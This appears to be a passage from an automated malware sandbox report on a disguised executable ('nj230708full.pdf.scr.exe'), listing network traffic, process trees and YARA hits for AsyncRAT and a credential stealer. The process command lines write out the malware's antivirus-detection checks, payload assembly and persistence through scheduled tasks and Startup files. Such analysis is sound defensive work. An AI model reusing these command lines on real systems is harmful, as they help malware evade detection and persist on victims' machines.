Nov 13, 2024 18:44:55.822030067 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.822089911 CET	49998	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.822105885 CET	443	49998	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.891599894 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.892486095 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:55.896370888 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.896370888 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:55.896370888 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.017225027 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.020522118 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.020555019 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.020798922 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.020806074 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.133949995 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.134371996 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.134433031 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.134737968 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.134752035 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.149024963 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.149125099 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.149167061 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.149301052 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.149316072 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.149328947 CET	50000	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.149336100 CET	443	50000	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.201064110 CET	49999	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.201138020 CET	443	49999	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.262629986 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.263020039 CET	443	50001	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:56.263292074 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.263293028 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.263293028 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.576050997 CET	50001	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:56.576116085 CET	443	50001	13.107.246.45	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:43:12.746110916 CET	61609	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:43:12.757139921 CET	53	61609	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 18:43:12.746110916 CET	192.168.2.4	1.1.1.1	0x145e	Standard query (0)	ldGbGMtXrGEEgvmsQPPgfGUzt.ldGbGMtXrGEEgvmsQPPgfGUzt	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 18:43:12.757139921 CET	1.1.1.1	192.168.2.4	0x145e	Name error (3)	ldGbGMtXrGEEgvmsQPPgfGUzt.ldGbGMtXrGEEgvmsQPPgfGUzt	none	none	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:43:25.824043989 CET	1.1.1.1	192.168.2.4	0x49de	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:43:25.824043989 CET	1.1.1.1	192.168.2.4	0x49de	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:43:39.943555117 CET	1.1.1.1	192.168.2.4	0x9dab	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:43:39.943555117 CET	1.1.1.1	192.168.2.4	0x9dab	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:44:02.641232967 CET	1.1.1.1	192.168.2.4	0xff93	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:44:02.641232967 CET	1.1.1.1	192.168.2.4	0xff93	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:43:04
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nj230708full.pdf.scr.exe"
Imagebase:	0x400000
File size:	2'697'122 bytes
MD5 hash:	E8285F01DFF90FCA4B37D4DF7DA03C4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:43:07
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:43:07
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:43:08
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1b0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:43:08
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x5d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:43:09
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1b0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:43:09
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x5d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:43:09
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 186040
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:43:09
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "toolkitczechhappenwestminster" Texture
Imagebase:	0x5d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:43:10
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Junk + ..\Screenshot + ..\Colombia + ..\Escorts + ..\Waiver + ..\Aboriginal + ..\Wherever + ..\Higher + ..\Amazon + ..\Releases + ..\Dame + ..\Economic + ..\Innovations + ..\Sampling + ..\Nuke + ..\Fellowship + ..\Brain + ..\Eat + ..\Shopping + ..\Constitution + ..\Planes + ..\Railroad + ..\Enhancing + ..\Locator + ..\Occasion + ..\Pay + ..\Cinema L
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:43:10
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\186040\Tracks.pif
Wow64 process (32bit):	true
Commandline:	Tracks.pif L
Imagebase:	0x150000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xa80000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x3a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & echo URL="C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"
Imagebase:	0x7ff71d9b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:43:11
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:43:12
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"
Imagebase:	0xa80000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:43:24
Start date:	13/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"
Imagebase:	0x7ff71d9b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:43:25
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K"
Imagebase:	0xa80000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:43:42
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x880000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:43:49
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:43:49
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:43:49
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:43:49
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:43:50
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Imagebase:	0x3a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:43:50
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0x390000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:43:51
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\winservices.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\winservices.exe
Imagebase:	0x9b0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:43:51
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f330000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:43:53
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\winservices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winservices.exe"
Imagebase:	0x730000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:43:53
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:44:47
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x280000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:44:55
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7988, Parent PID: 4500

General

Target ID:	38
Start time:	12:44:55
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:44:55
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"'
Imagebase:	0x3a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:44:56
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:44:56
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:44:56
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0x7ff7f5020000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:44:59
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Roaming\winservices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\winservices.exe"
Imagebase:	0xec0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:44:59
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7
{, xrefs: 00405352

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
